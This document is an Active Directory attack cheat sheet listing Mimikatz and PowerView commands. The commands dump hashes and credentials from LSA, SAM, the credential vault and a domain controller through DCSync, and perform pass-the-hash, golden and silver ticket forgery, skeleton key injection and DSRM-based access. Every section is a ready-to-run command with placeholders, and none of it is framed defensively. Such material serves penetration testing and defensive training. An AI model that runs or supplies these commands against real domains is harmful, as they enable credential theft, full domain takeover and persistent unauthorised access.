Dump hashes from local machine
Invoke-Mimikatz -DumpCreds
To dump all the hashes
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
To dump hashes from SAM
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
To view clear text credentials from credential vault
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
OVER PASS THE HASH ATTACK
Perform Pass The Hash for a specific user
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USERNAME> /domain:<USER DOMAIN> /ntlm:<NTLM HASH OF USER> /run:powershell.exe"'
GOLDEN TICKET ATTACK
Execute mimikatz as Domain Admin on DC to get krbtgt NTLM hash
Perform Golden Ticket Attack for a specific user
Invoke-Mimikatz -Command '"kerberos::golden /user:<USERNAME> /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /krbtgt:<NTLM OF KRBTGT> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
SILVER TICKET ATTACK
Perform Silver Ticket Attack for a specific user
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /target:<TARGET COMPUTER NAME> /service:HOST /rc4:<NTLM OF MACHINE> /user:<USERNAME> /ptt"'
DC SYNC ATTACK
Check replication rights for a specific user
Get-ObjectAcl -DistinguishedName "dc=<SUBDOMAIN NAME>,dc=<DOMAIN.../FORESTNAME>,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "<USERNAME>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
To add replication/DCSync rights for a specific user (Needs Domain Admin Privileges)
Add-ObjectAcl -TargetDistinguishedName "dc=<SUBDOMAIN>,dc=<DOMAIN.../FOREST>,dc=local" -PrincipalSamAccountName <USERNAME> -Rights DCSync -Verbose
Perform DCSync attack to extract "krbtgt" hashes, which can be used to perform Golden Ticket attacks for future
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
SKELETON KEY ATTACK
Needs to be run on Domain Admin Privilege in DC and works only once for a DC which is not rebooted
Perform Skeleton Key Attack (Password : mimikatz - Valid for all users until DC is restarted)
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
USING DSRM HASH
Dump the DSRM Administrator hash from SAM of DC
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
DSRM Admin is not allowed to logon into the Domain Controller by default
We have to change the registry value to allow access and should be modified in DC
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
Now, we can just use Pass The Hash to gain access on file system of DC remotely
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:<DSRM OF DC> /run:powershell.exe"'